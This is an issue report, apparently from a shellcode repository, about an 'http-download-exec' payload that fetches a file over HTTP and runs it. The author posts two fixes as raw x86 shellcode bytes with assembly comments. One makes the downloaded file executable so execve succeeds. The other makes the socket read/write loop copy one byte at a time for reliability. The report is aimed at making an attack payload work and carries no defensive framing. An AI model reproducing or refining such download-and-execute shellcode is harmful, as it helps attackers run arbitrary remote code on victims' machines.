Permissions, DL in http-download-exec #1
Description
Hi,
I just spent a couple of hours with this shellcode and ran into two issues:
First, the output file was created with -----x--- permissions, which causes execve to fail with permission denied. I modified it to use rwx------:
"\x89\xe3" // mov %esp,%ebx
"\x50" // push %eax
+ "\x68\xc0\x01\x01\x01" // pushl 700 permissions
"\x59" // pop %ecx
"\xcd\x80" // int $0x80
"\x96" // xchg %eax,%esi
Second, the read/write loop uses a size of 4 bytes. This causes failures when the socket returns less than 4 bytes but we still write 4 bytes. Switching the size to 1 works reliably.
"\x81\x39\x0a\x0d\x0a\x0d" // cmpl $0xd0a0d0a,(%ecx)
"\x75\xf3" // jne <_wait_for_dbl_crlf>
- "\xb2\x04" // mov $0x4,%dl
+ "\xb2\x01" // mov $0x1,%dl
//
// <_dump_loop_do_read>:
Sorry for not sending this as a patch, but these are still hackish and at the moment I don't have time to clean it up.